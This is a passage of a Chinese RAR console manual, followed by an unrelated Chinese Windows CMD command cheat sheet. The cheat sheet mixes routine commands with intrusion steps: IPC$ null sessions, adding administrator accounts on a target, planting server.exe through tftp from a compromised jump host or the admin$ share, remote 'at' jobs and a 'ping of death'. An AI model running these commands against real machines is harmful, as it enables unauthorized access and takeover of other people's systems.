会减小压缩比。 默认可变字典大小是 4096 KB. 例子: RAR a -s -mdd sources *.asm 或者 RAR a -s -md512 sources *.asm 将使用512 KB字典创建固实压缩文件。 -ms[列表] 指定存储文件类型。 指定不压缩而直接存贮的文件类型。这个开关被用来存储已经压缩的文件, 这将帮助增加压缩速度,而不会显著的减小压缩率。 可选参数 <列表> 参数定义使用分号隔开的文件扩展名列表。例如, -msrar;zip;jpg 将强制RAR不压缩直接存储所有的RAR和ZIP压缩文件和 JPG 图像。它也允许在列表中指定通配符文件掩码,所以 -ms*.rar; *.zip;*.jpg 也可以工作。 如果 <列表> 没有被指定,-ms 开关将使用默认的包含下列文件类型的扩 展设置: 7z, ace, arj, bz2, cab, gz, jpeg, jpg, lha, lzh, mp3, rar, taz, tgz, z, zip -mt<线程> 设置线程数。仅可用于 Window 版本。 <线程> 参数可以是从 0 到 16 的值。它定义对于压缩算法活动线程的 推荐数。如果它大于 0,RAR 会使用多线程版本的压缩算法,在多处理 器系统上提供更高的速度。真实的活动线程数可能和指定的不同。 如果 <线程> 是 0,RAR 会使用单线程压缩算法。 改变 <线程> 参数轻微影响压缩率,所以如果所有其它压缩参数相等而 使用不同的 -mt 开关创建的压缩文件不会解压得一样连贯。 如果没有指定 -mt 开关,RAR 会尝试检测可用的处理器的数量并自动 选择优化的线程数。 -n<文件> 仅包含指定的文件 <文件>。通配符在文件掩码的名称和文件部分都可用。 你可以数次指定开关‘-n’。 此关不能替换通常的文件掩码,仍然需要在命令行中输入。它是一个附加 的过滤器限制处理的文件那些仅匹配在 –n 开关中指定掩码的文件。某些 时候它可以帮助减少命令行的长度。 例如,如果你需要压缩在 Project 和 Info 文件夹内的所有的 *.txt 和 *.lst 文件,你可以输入: rar a -r text Project\*.txt Project\*.lst Info\*.txt Info\*.lst 或使用开关 -n: rar a -r -n*.txt -n*.lst text Project Info -n@<列表文件> 包含在指定的列表文件中列出的文件。 和 -n<文件> 开关类似,但是从列表文件读取掩码。 示例: rar a -r -n@inclist.txt text Project Info -oc 设置 NTFS 压缩属性。只可用于 Win32 版本。 此开关允许解压文件时恢复 NTFS 压缩属性。RAR 在创建一个压缩文件时 保存“压缩”文件属性,但是如果不指定 -oc 开关就不会恢复它们。 -ol 把符号链接作为链接而不是文件。 只有 Unix 版本可用。 -or 如果相同名字的文件已经存在则自动重命名解压的文件。重命名文件将得 到象 'filename(N).txt' 的名字,'filename.txt' 的位置是原始的文件 名,如果文件存在 'N' 是从 1 增加数字。 -os 保存 NTFS 流。 只有 Win32 版本可用。 这个开关意味着只能在 NTFS 文件系统下使用,并允许储存与文件相关的 交替数据流。在 Windows 2000、XP 和更新的 Windows 版本底下尤其重要, 可以用来保存某些文件依赖信息,如文件描述。如果您使用 RAR 来备份您 的 NTFS 磁盘时,建议您指定这个开关。 -ow 当压缩时保存文件安全信息和解压时恢复它们时,使用这个开关。 Unix 版本的 RAR 当使用这个开关时保存文件所有者和组。 Win32 版本存储所有者、组、文件许可和校验信息,但是你必须有读取 它们的必需的权限。 注意只有 NTFS 文件系统支持在Windows下的文件基 本安全数据。 -o[+|-] 设置覆盖模式。可以在解压或更新文件时使用。下列模式可用: -o 覆盖前询问 (默认用于解压文件); -o+ 覆盖所有 (默认用于更新的压缩文件); -o- 跳过已存在的文件。 -o+ 覆盖已存在的文件。 -o- 不覆盖已存在的文件。 -p[p] 压缩时,使用字符串

作为密码加密文件。密码大小写敏感。如果你在 命令行忽略密码,你会看到一个输入密码的提示。 例子: rar a -pmyhoney secret1 *.txt 添加 *.txt文件并用密码"myhoney"加密. -p- 不询问密码 -r 包含子文件夹,可以使用命令: a,u,f,m,x,e,t,p,v,l,c,cf 和 s. 当使用命令 'a','u','f','m' 将处理在所有子目录中以及当前工作目 录的中的文件。 当使用命令 x,e,t,p,v,l,c,cf 或 s 将处理在子目录以及当前工 作目录中所有压缩文件。 -r- 禁用递归。 在某些情况下,即使没有指定 -r 开关 RAR 也会自动启用递归。开关 -r- 禁止它。 压缩时如果你指定了目录名,目录名不包含通配符,即使 -r 开关没有指定, 默认 RAR 添加目录的内容。如果磁盘根目录没有把通配符作为文件掩码指定, RAR 也会自动启用递归。开关 -r- 禁用此行为。 例子: rar a -r- arc dirname 命令仅会添加空目录 'dirname' 目录并忽略它的内容。下列命令: rar a -r- arc c:\ 会仅压缩 c: 根目录的内容并不会包含子目录。 -r0 和 -r 相似,但是当使用命令 'a','u','f','m' ,将返回包含包括通 配符 '*' 和 '?'的子目录 -ri

[:] 设置优先级和休眠时间。只有在 Windows 版本的 RAR 中可用。 这个开关让 RAR 在多任务环境下时,用来控制系统载入负荷。可用任务 优先级值从 0 到 15。当

等于 0 时,使用默认任务优先级。1 对应 最低的任务优先权,15 - 最高。 休眠时间 是从 0 到 1000 (千分之一秒)的值。这是 RAR 压缩或解 压缩操作期间每次读或写时将会归还到系统的时段。休眠时间设定在几个 相同优先级任务在系统中同时运行时有用。 例子: 使用默认优先级执行 RAR,并且每次读取或写入后有10 ms的休眠 rar a -r -sfx -ri0:10 backup *.* -rr[N] 添加数据恢复记录。这个开关在创建或修改压缩文件被用来添加压缩文件 数据的恢复记录。 -rv[N] 创建恢复卷。这个开关在创建多卷压缩文件时用来创建恢复卷。查看 'rv[N]'命令的详细描述。 -s 创建固实压缩文件。固实格式是一种特别的压缩文件类型。请参考附录中的 “术语表”获得更多信息。 例子: 使用512KB的字典创建固实压缩文件 sources.rar ,包含全部子目录,从 当前目录开始,只添加.asm文件: rar a -s -md512 sources.rar *.asm -r -s 根据文件计数创建固实组 和 -s 相似,但是在压缩文件后重置压缩文件的状态。通常减少压缩率, 但是也能减少损坏的固实压缩文件中的文件丢失。 -sc<字符集>[对象] 指定列表文件和压缩包注释文件的字符集。 “字符集”参数是强制的, 可以使用下列值: U - Unicode; A - ANSI (Windows) 编码。仅用于 Windows 版本; O - OEM (DOS) 编码。仅用于 Windows 版本; Unicode 格式的文件必须以 FFFE 或 FEFF Unicode 字符开头, 否则 RAR 会 忽略此开关并作为 ASCII 文本处理。 “对象”参数是可选的, 可以使用下列值: L - 列表文件; C - 命令文件。 它允许指定不只一个对象, 例如, -scolc。如果 '对象' 参数丢失, '字符 集' 会应用到所有对象。 此开关允许指定在 -z[文件] 开关中的文件的字符集, 列表文件和注释文 件在 "cw" 命令中写入。l 例子: 1) rar a -scol data @list 使用 OEM 编码读取 'list' 中包含的名称。 2) rar c -scuc -zcomment.txt data 读取 comment.txt 为 Unicode 文件。 3) rar cw -scuc data comment.txt 写入 comment.txt 为 Unicode 文件。 -se 根据扩展名创建固实组 和 -s 相似,但是如果文件扩展名改变,重置压缩文件的状态。通常减少压 缩率,但是也能减少损坏的固实压缩文件中的文件丢失。 -sfx[名称] 创建自解压压缩文件。如果建立新压缩文件时使用此开关,自解压文件(使 用 default.sfx 模块或在开关中指定)将被创建。在 Windows 版本中, default.sfx 应该在 rar.exe 所在的目录中,在 Unix 中 - 在用户的 home 目录中。在/usr/lib 或 /usr/local/lib 中。 例子: rar a -sfxwincon.sfx myinst 使用 wincon.sfx 自解压模块创建自解压(SFX)压缩文件。 -si[名称] 当创建一个压缩文件时,从 stdin(标准输入)读取数据。选项“名称”参 数允许指定要创建的压缩文件内的标准输入数据的文件名。如果这个参数 丢失,名字会被设为“stdin”。此开关不能和 -v 一起使用。 例子: type Tree.Far | rar a -siTree.Far tree.rar 将把 'type Tree.Far' 作为 'Tree.Far' 文件压缩输出. -sv 创建互不依赖的固实压缩文件 当开始一个新的卷时,RAR 默认尽可能的尝试重置固实格式状态,但是只有 在上一次复位后,又压缩了足够多的数据。(至少几兆字节)。 这个开关会强制 RAR 忽略打包的数据大小,并试图对任何大小的分卷重置 状态。这会降低压缩率,但在固实卷组中的数个卷之一丢失或损坏时可以 增加解压部分数据的机会。 注意有时候 RAR 即使使用这个开关也无法重置状态。例如,当压缩一个 大文件成许多分割卷时就不能完成。RAR 只能在分离文件之间重置状态, 而不能用在单独文件上。 在创建不带卷的压缩文件时忽略。 -sl<大小> 仅处理大小小于在此开关的 <大小> 参数中指定的大小的文件。 参数 <大小> 必须以字节为单位指定。 -sm<大小> 仅处理大小超过在此开关的 <大小> 参数中指定的大小的文件。 参数 <大小> 必须以字节为单位指定。 -sv- 创建互相依赖的固实压缩文件 禁止卷之间重设固实状态。 这将稍微提高压缩率,但是意味着如果数个固实卷之一丢失或损坏时减 少解压部分数据的机会。 在创建不带卷的压缩文件时忽略。 -s- 禁止固实压缩 -t 压缩后测试文件。这个开关在和移动命令组合使用时非常有用,所以只有 压缩文件已经被成功测试后,文件才会被删除。 -ta<日期> 只处理指定日期之后修改的文件。 日期字符串的格式是 YYYYMMDDHHMMSS。它允许在日期字符串中插入'-' 或 ':'的分隔符,并忽略后部区域。例如,下列开关是正确的: -ta2001-11-20在内部它被转换成 -ta20011120000000 并作为"从2001 年11月20日0时0分0秒后修改的区域"对待。 -tb<日期> 只处理指定日期之前修改的文件。开关的格式和 -ta<日期> 相同。 -tk 保存原始压缩文件日期。防止当正在改变一个压缩文件时RAR修改文件。 -tl 设置压缩文件的日期为最新文件的日期。强制RAR设置改变的压缩文件的日 期为压缩文件中最新文件的日期。 -tn<时间> 处理指定时间以后的新文件。时间字符串格式时: [d][h][m][s] 例如,使用开关 -tn15d 来处理更新了15天的文件,-tn2h30m 来处理更 新了2小时30分的文件。 -to<时间> 处理指定时间以前的旧文件。开关的格式和 -tn<时间> 相同。 -ts[N] 保存或恢复文件时间(修改,创建,访问)。 开关 -tsm 指示 RAR 保存文件的修改时间,-tsc - 创建时间,tsa - 最 近访问时间。开关后的可选参数是 0 和 4 之间的数字来控制文件时间精 度。值‘1’启用 1 秒的精确度,2 - 0.0065536 秒, 3 - 0.0000256,4 或‘+’启用最大的 NTFS 时间精度,等于 0.0000001 秒。值‘0’或‘-’ 意味着创建和访问时间不保存,并且修改时间使用低的(两秒)时间精度。 更高的精度模式添加更多的数据到压缩文件中,使用 -tsm4 -tsa4 -tsc4 组合,让每个文件增加 19 个额外的字节。如果没有指定精度,RAR 使用 ‘4’(高)值。 默认的 RAR 模式是 -tsm4 -tsc0 -tsa0,所以高精度的修改时间被存储, 其它时间被忽略。 当解压文件(精度不相关,但是不能为 0)时指定 -tsc 和 -tsa 开关来设置 创建和访问时间是必需的。默认 RAR 只设置修改时间,即使压缩文件包含 创建和最近修改时间。设置修改时间来解压文件也可以使用 -tsm- 禁用。 如果你需要把这个开关应用到所有的三个时间,也可能忽略这三个类型字母。 例如,-tsm4 -tsa4 -tsc4 能被 -ts4, -ts+ 或 -ts 代替。使用 -ts- 来 只保存低精度的修改时间,或者忽略所有三个文件时间解压。 当创建一个压缩文件时,如果高的模式不被文件系统支持,RAR 会自动减少 精度。在 FAT 中不会超过两秒,在 Unix 中不会超过 1 秒。NTFS 时间精 度是 0.0000001 秒。 操作系统的时间限制解压时能被设置。Windows 允许设置三个时间,Unix - 修改时间和最近访问时间,没有创建时间,DOS 只支持修改时间。 例子: 1) rar a -ts backup 使用最高精确度存储所有文件时间。 2) rar x -tsa backup 存储修改和最近访问时间。开关 -tsm 不是必需的,因为 RAR 把它作为默 认值。 3) rar a -tsm1 -tsc1 backup 存储低精确度的修改和创建时间。没有 -tsm1 RAR 将会保存高精确的修改 时间。 -u 更新文件。 这可在解压或创建压缩文件时使用。命令字符串 'a -u' 和 命令 'u'等效。您也可以使用开关'-u'和命令'm'和'mf'一起使用。如果开 关'-u'使用与命令'x'或'e'一起使用,则在磁盘上不存在的文件和比在磁 盘上的拷贝新的文件将从压缩文件中解压。 -v 创建自动检测大小的卷或列出所有的卷 当正在创建或正在列表卷时这个开关可以使用。 在第一种情况下,它启用卷的自动大小检测,所以新的卷将使用目标媒体 上的所有可用空间。当在可移动磁盘上创建卷时非常便利。你可以在 -v <大小> 的描述中读到更多关于卷的信息。 在第二种情况下,在命令行中当这个开关和'V' 或 'L'命令一起使用,它 强制 RAR 列出从指定卷开始的所有卷的内容。没有这个开关,RAR 只显 示单独的被指定卷的内容。 -v<大小>[k|b|f|m|M|g|G] 建立卷,大小=<大小>*1000 [*1024 | *1]。 默认此开关使用 <大小> 作为一千(1000)字节(非1024 字节)。您也可以 输入符号 "k" 来表示千字节(1024)的大小,或者符号 "b" 表示字节,兆 字节(1024 x 1024)为 -"m",而一百万个字节是 - "M",G字节 - 'g', 十亿个字节 - 'G' 或者使用符号 "f" 从几个预先定义的数值中选择一个。 预先定义的数值有 360、720、1200、1440 或 2880 并会使用当前软盘大 小取代。 如果大小被忽略,将使用自动检测。 你可以指定几个 -v 开关来为不同的卷设置不同的大小。例如: rar a -v100k -v200k -v300k arcname 第一卷设为 100 KB 大小, 第二卷设为 200 KB, 剩下的为 300 KB。 如果在可移动磁盘上创建卷,第一卷被创建后,用户将被提示: 创建下一卷: 是/否/全部 此时,您可以改变磁盘。回答'A'将使所有的卷不暂停地被创建。 默认 RAR 卷以'volname.partNNN.rar'格式命名,NNN的地方是卷号。使 用-vn开关可能转换成其它的扩展基本命名规则,卷组中第一卷文件由.rar 的扩展名,以后卷从 .r00 到 .r99 命名。 当解压或测试多卷压缩文件时,你必须只使用第一卷的文件名。如果在驱 动器中没有下一卷并且磁盘可移动,用户会被提示: 插入磁盘带有 <下一卷名> 插入带有正确卷的磁盘并按任意键。 如果在解压过程中,下一卷没有找到或卷放在不可移动磁盘上,RAR 将显 示下列信息后中断: 没有找到 <卷名> 压缩卷不可以被修改。命令'd','f','u','s' 不能在多卷组中使用。 命令'a'只可以用在创建新的多卷序列时。 也许,虽然不太可能,多卷组中文件大小可能比未压缩时大,原因是'存 储'特征(如果大小增加时不压缩)在多卷组中不能启用。 压缩卷可以是自解压格式,这样的压缩文件可使用 '-v' 或 '-sfx'开关 创建。 例子: 创建固定大小的固实分卷压缩文件: rar a -s -v1440 floparch.rar *.* 将创建固实的1440000字节大小的卷。 -vd 创建卷之前清除磁盘内容 当使用 '-vd' 时,目标盘上的所有文件和目录都将被删除。这个开关只 能用在可移动磁盘上,使用这个开关不能删除硬盘内容。 -ver[n] 文件版本控制 当在已经存在的压缩文件中更新文件时,强制 RAR 保留前一文件版本。 旧版本被命名为'filename;n','n'处是版本号。 当不使用开关 -ver 解压一个压缩文件,rar 默认只解压最近添加的文件 版本,它的名字不能包含数字后缀。但是如果你正确指定了文件名,包括 版本,它也可以解压。例如,'rar x arcname'将只解压最新版本,当使 用 'rar x arcname file.txt;5' 将解压 'file.txt;5',如果它在压缩 文件中存在的话。 解压时如果你不带参数指定-ver开关, RAR 将解压所有和文件掩码匹配的所有文件中的所有版本。这样版本号没 有从未压缩文件名中删除。你也可以使用数字作为-ver的参数来解压一个 具体的文件版本。它将告诉RAR只解压这个版本并从文件名中删除版本号。 例如,'rar x -ver5 arcname' 将只解压第五版本文件。 如果压缩时你指定了‘n’参数,它会限制在压缩文件中文件版本的最大 数字。超过此限制的旧的文件版本会被移除。 -vn 使用旧风格的卷命名法则 默认 RAR 卷以'volname.partNNN.rar'格式命名,NNN的地方是卷号。使 用-vn开关可能转换成其它的扩展基本命名规则,卷组中第一卷文件由 .rar 的扩展名,以后卷从 .r00 到 .r99 命名。它可能有用,如果你要 在 MS DOS下解压一个压缩文件时,不允许在文件名中超过一个点'.'。 -vp 每一卷后暂停 默认 RAR 仅在使用可移动驱动器创建或解压下一卷前,进行更换磁盘的 询问。这个开关将强制 RAR 总是进行这样的询问。如果磁盘空间有限而 且你希望创建后立即复制每一卷到其它磁盘中时,可以使用它。 -w

作为工作目录。这个开关可以用来分配临时文件工作目录。 -x 排除指定的文件 ,通配符可以用在名称和文件掩码的文件部分。你 可以数次指定开关'-x'。 如果掩码包含通配符,它应用到当前目录和它的子目录。没有通配符它不 递归,所以如果你要在所有文件夹中排除某些“文件名”,你需要指定两 个掩码:用于当前目录的“文件名”和用于子目录的“*\filename”。如果 你知道一个文件的确切路径,你可以是使用“路径\文件名”语法来仅排除 “文件名”的此副本。如果你在解压一个压缩文件时使用 -x路径\文件名 语法,“路径”必须是一个压缩文件内的路径,而不是在解压后的磁盘上 的文件路径。 例子: 1) rar a -r -x*.bak -x*.rar rawfiles *.bak 和 *.rar 不会添加到 rawfiles 中 2) rar a -r -x*\temp -x*\temp\* savec c:\* 压缩 C: 上除了 Temp 文件夹中的临时目录和文件外的所有文件 3) rar x -x*.txt docs 从 docs.rar 解压除了 *.txt 外的所有文件 -x@ 排除指定文件列表中列出的文件。如果你使用 -x@ 而没有列表文件名参数, 它会从标准输入设备读取文件名。 例子: rar a -x@exlist.txt arch *.exe -y 对于所有询问全部回答是。 -z[f] 从文件中读取压缩文件注释。如果你需要指定注释文本文件的字符 集使用 -sc 开关。如果 没有指定, 注释从标准输入设备读取。 限制 ~~~~ 路径名长度小于 259 个字符。 最大的压缩文件注释的长度是 62000 字节。 命令限制: 命令 'd','u','f','c','cf' 不能用于分卷压缩文件。 命令 'a' 不能用来更新分卷压缩文件,只能用来创建一个新的。 返回值 ~~~~~~ RAR 成功操作后返回 0 。非 0 返回码意味着操作由于某种错误被取消: 255 用户中断 用户中断操作 9 创建错误 创建文件错误 8 内存错误 没有足够的内存进行操作 7 用户错误 命令行选项错误 6 打开错误 打开文件错误 5 写错误 写入磁盘错误 4 被锁定压缩文件 试图修改先前使用 'k' 命令锁定的压缩文件 3 CRC 错误 解压缩时发生一个 CRC 错误 2 致命错误 发生一个致命错误 1 警告 没有发生致命错误 0 成功 操作成功 术语表 ~~~~~~ 压缩文件 包含一个一个以上文件的压缩和/或加密的特定文件。 压缩 减少数据大小的编码方法。 CRC 循环冗余检查。为了验证数据正确性检查特定信息的数学计算方法。 SFX 压缩文件模块执行时用于解压文件(自解压文件模块),通常是一个 .EXE格式文件。 固实 对压缩文件使用专用的压缩方式(把所有文件看成一个连续的数据 流)打包。当压缩大量小文件特别有利。 卷 压缩文件的拆分部分。把一个压缩文件拆分成存储在磁盘上。固实 格式卷解压时必须从序列中的第一个开始。 版权所有 (c) 1993-2009 Alexander Roshal

用户手册 ~~~~~~~~ RAR 3.30 32 位控制台版本 ~~~~~~~~~~~~~~~~~~~~~~~~ =-=-=-=-=-=-=-=-=-=-=-=-=-=- 欢迎使用 RAR 压缩文件管理器! -=-=-=-=-=-=-=-=-=-=-=-=-=-= 简介 ~~~~ RAR 是一个强力压缩工具,允许你管理和管理压缩文件。控制台 RAR 只支持 RAR 格式,带有的 ".rar" 扩展名的文件。ZIP 和其他格式不被支持。Windows 用户可以 安装图形界面 RAR 版本 - WinRAR,它可以处理更多的压缩文件类型。 RAR 的功能包括: * 高度成熟的原创压缩算法 * 对于文本、声音、图像和 32 位和 64 位 Intel 可执行程序压缩的特殊优化算法 * 获得比类似工具更好的压缩率,使用'固实'压缩 * 身份校验(只有注册版本可用) * 自解压压缩文件和分卷压缩(SFX) * 对物理损伤的压缩文件的恢复能力 * 锁定,密码,文件顺序列表,文件安全和更多…… 配置文件 ~~~~~~~~ Unix 版本的 RAR 从用户的 home 或 /etc 目录中的 .rarrc 文件读取配置文件信息 (存储在 HOME 环境变量中) Windows 的版本 RAR 从 rar.ini 文件读取配置文件信息,它放在 rar.exe 文件相 同的目录中。 这个文件包含下列字符串: 开关= 环境变量 ~~~~~~~~ 可以通过建立"RAR"环境变量来添加默认参数到命令行中. 例如,在 UNIX 中,下列命令行可以被添加到你的配置中: RAR='-s -md1024' export RAR RAR 将使用这个字符串作为命令行的默认参数,并将使用 1024KB 字典大小来创建 “固实”压缩文件。 RAR 控制选项使用下列优先级: 命名行开关 最高优先级 在 RAR 变量中的开关 低优先级 保存在配置文件中的开关 最低优先级 日志文件 ~~~~~~~~ 如果在命令行或配置文件中指定开关 -ilog ,RAR 将会把处理压缩文件中遇到的错误 等写到日志文件中。在 Unix 中,这个文件名为 .rarlong,放在用户的 home 目录中。 在 Windows 中,它名为 rar.log,放在 rar.exe 文件相同的目录中。开关 -ilog 允 许改变默认的日志名。 固实压缩的文件列表 - rarfiles.lst ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ rarfiles.lst 包含用户定义的文件列表,告诉RAR添加文件到固实压缩文件时的顺序。 它可以包含文件名通配符和指定项目-$default。默认项目定义了这个文件中与其他 项目不相符时的顺序清单位置。 注释字符是 ';'. 在 Windows 中,这个文件应该放在RAR所在的目录中。 在 Unix 中- 放在用户的 home 目录或 /etc中。 提高压缩率和操作速度的提示: - 在压缩文件中,小文件应该被组织在一起; - 频繁被处理的文件应该放在开始的位置。 普通的掩码越靠近顶端优先权就越高,但是这个规则存在例外。如果 rarfiles.lst 包含两个掩码,并且所有文件及匹配第一个掩码,也匹配第二个掩码, 第一个掩码 将拥有更高的优先权,即使它被放到第二个后面。例如,存在*.cpp 和 f*.cpp 掩码 的情况下,f*.cpp 拥有更高的优先权。 RAR 命令行语法 ~~~~~~~~~
CMD命令:开始->运行->键入cmd或command(在命令行里可以看到系统版本、文件系统版本) 命令大全 1. gpedit.msc-----组策略 2. sndrec32-------录音机    3. Nslookup-------IP地址侦测器 ,是一个 监测网络中 DNS 服务器是否能正确实现域名解析的命令行工具。它在 Windows NT/2000/XP 中均可使用,但在 Windows 98 中却没有集成这一个工具。    4. explorer-------打开资源管理器    5. logoff---------注销命令    6. shutdown-------60秒倒计时关机命令    7. lusrmgr.msc----本机用户和组    8. services.msc---本地服务设置    9. oobe/msoobe /a----检查XP是否激活    10. notepad--------打开记事本    11. cleanmgr-------垃圾整理    12. net start messenger----开始信使服务    13. compmgmt.msc---计算机管理    14. net stop messenger-----停止信使服务    15. conf-----------启动netmeeting    16. dvdplay--------DVD播放器    17. charmap--------启动字符映射表    18. diskmgmt.msc---磁盘管理实用程序    19. calc-----------启动计算器    20. dfrg.msc-------磁盘碎片整理程序    21. chkdsk.exe-----Chkdsk磁盘检查    22. devmgmt.msc--- 设备管理器    23. regsvr32 /u *.dll----停止dll文件运行    24. drwtsn32------ 系统医生    25. rononce -p----15秒关机    26. dxdiag---------检查DirectX信息    27. regedt32-------注册表编辑器    28. Msconfig.exe---系统配置实用程序    29. rsop.msc-------组策略结果集    30. mem.exe--------显示内存使用情况    31. regedit.exe----注册表    32. winchat--------XP自带局域网聊天    33. progman--------程序管理器    34. winmsd---------系统信息    35. perfmon.msc----计算机性能监测程序    36. winver---------检查Windows版本    37. sfc /scannow-----扫描错误并复原    38. taskmgr-----任务管理器(2000/xp/2003)    39. regsvr32 /u *.dll----停止dll文件运行    40. wmimgmt.msc----打开windows管理体系结构(WMI)    41. wupdmgr--------windows更新程序    42. wscript--------windows脚本宿主设置    43. write----------写字板    45. wiaacmgr-------扫描仪和照相机向导    46. winchat--------XP自带局域网聊天    49. mplayer2-------简易widnows media player    50. mspaint--------画图板    51. mstsc----------远程桌面连接    53. magnify--------放大镜实用程序    54. mmc------------打开控制台    55. mobsync--------同步命令    57. iexpress-------木马捆绑工具,系统自带    58. fsmgmt.msc-----共享文件夹管理器    59. utilman--------辅助工具管理器    61. dcomcnfg-------打开系统组件服务    62. ddeshare-------打开DDE共享设置    63. osk------------打开屏幕键盘    64. odbcad32-------ODBC数据源管理器    65. oobe/msoobe /a----检查XP是否激活    66. cmd.exe--------CMD命令提示符    67. regsvr32 /u zipfldr.dll------取消ZIP支持    68. ntbackup-------系统备份和还原    69. narrator-------屏幕“讲述人”    70. ntmsmgr.msc----移动存储管理器    71. ntmsoprq.msc---移动存储管理员操作请求    72. netstat -an----(TC)命令检查接口    73. syncapp--------创建一个公文包    74. sysedit--------系统配置编辑器    75. sigverif-------文件签名验证程序    76. ciadv.msc------索引服务程序    77. shrpubw--------创建共享文件夹    78. secpol.msc-----本地安全策略    79. syskey---------系统加密,一旦加密就不能解开,保护windows xp系统的双重密码    80. services.msc---本地服务设置    81. Sndvol32-------音量控制程序    82. sfc.exe--------系统文件检查器    83. sfc /scannow---windows文件保护    84. ciadv.msc------索引服务程序    85. tourstart------xp简介(安装完成后出现的漫游xp程序)    86. taskmgr--------任务管理器    87. eventvwr-------事件查看器    88. eudcedit-------造字程序    89. compmgmt.msc---计算机管理    90. packager-------对象包装程序    91. perfmon.msc----计算机性能监测程序    92. charmap--------启动字符映射表    93. cliconfg-------SQL SERVER 客户端网络实用程序    94. Clipbrd--------剪贴板查看器    95. conf-----------启动netmeeting    96. certmgr.msc----证书管理实用程序 操作详解 net use ipipc$ " " /user:" " 建立IPC空链接    net use ipipc$ "密码" /user:"用户名" 建立IPC非空链接    net use h: ipc$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H:    net use h: ipc$ 登陆后映射对方C:到本地为H:    net use ipipc$ /del 删除IPC链接    net use h: /del 删除映射对方到本地的为H:的映射    net user 用户名 密码 /add 建立用户    net user guest /active:yes 激活guest用户    net user 查看有哪些用户    net user 帐户名 查看帐户的属性    net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限    net start 查看开启了哪些服务    net start 服务名 开启服务;(如:net start telnet, net start schedule)    net stop 服务名 停止某服务    net time 目标ip 查看对方时间    net time 目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息    net view 查看本地局域网内开启了哪些共享    net view ip 查看对方局域网内开启了哪些共享    net config 显示系统网络设置    net logoff 断开连接的共享    net pause 服务名 暂停某服务    net send ip "文本信息" 向对方发信息    net ver 局域网内正在使用的网络连接类型和信息    net share 查看本地开启的共享    net share ipc$ 开启ipc$共享    net share ipc$ /del 删除ipc$共享    net share c$ /del 删除C:共享    net user guest 12345 用guest用户登陆后用将密码改为12345    net password 密码 更改系统登陆密码    netstat -a 查看开启了哪些端口,常用netstat -an    netstat -n 查看端口的网络连接情况,常用netstat -an    netstat -v 查看正在进行的工作    netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况    netstat -s 查看正在使用的所有协议使用情况    nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名   tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。   ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。    ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)   ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息    tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)    kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)    del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件   del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同)    move 盘符路径要移动的文件名 存放移动文件的路径移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖    fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中,"> "和"> >" 是重定向命令    at id号 开启已注册的某个计划任务    at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止    at id号 /delete 停止某个已注册的计划任务   at 查看所有的计划任务    at ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机   finger username @host 查看最近有哪些用户登陆    telnet ip 端口 远和登陆服务器,默认端口为23    open ip 连接到IP(属telnet登陆后的命令)    telnet 在本机上直接键入telnet 将进入本机的telnet    copy 路径文件名1 路径文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件    copy c:srv.exe ipadmin$ 复制本地c:srv.exe到对方的admin下    copy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件    copy ipadmin$svv.exe c: 或:copyipadmin$*.* 复制对方admini$共享下的srv.exe文件(所有文件)至本地C:    xcopy 要复制的文件或目录树 目标地址目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件   用参数/e才可连目录下的子目录一起复制到目标地址下。    tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exec:server.exe 登陆后,将“IP”的server.exe下载到目标主机c:server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送    tftp -i 对方IP put c:server.exe 登陆后,上传本地c:server.exe至主机    ftp ip 端口 用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)    route print 显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface    arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息    start 程序名或命令 /max 或/min 新开一个新窗口并最大化(最小化)运行某程序或命令    mem 查看cpu使用情况    attrib 文件名(目录名) 查看某文件(目录)的属性    attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档,只读,系统,隐藏 属性;用+则是添加为某属性    dir 查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间    date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间    set 指定环境变量名称=要指派给变量的字符 设置环境变量    set 显示当前所有的环境变量    set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量    pause 